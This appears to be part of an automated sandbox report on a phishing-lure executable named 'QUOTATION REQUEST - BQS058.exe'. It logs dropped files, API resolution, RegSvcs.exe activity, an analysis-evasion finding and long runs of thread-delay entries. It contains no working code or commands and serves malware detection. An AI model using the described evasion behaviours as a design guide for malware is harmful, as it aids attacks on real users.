Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Code function: 2_2_00305376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00305376

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe

Code function: 0_2_00FF3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00FF3187

Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION REQUEST - BQS058.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	API/Special instruction interceptor: Address: 1296A5C
Source: C:\Users\user\AppData\Local\Allene\nonplacental.exe	API/Special instruction interceptor: Address: 10874E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599025	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598920	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593868	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599774	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599440	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
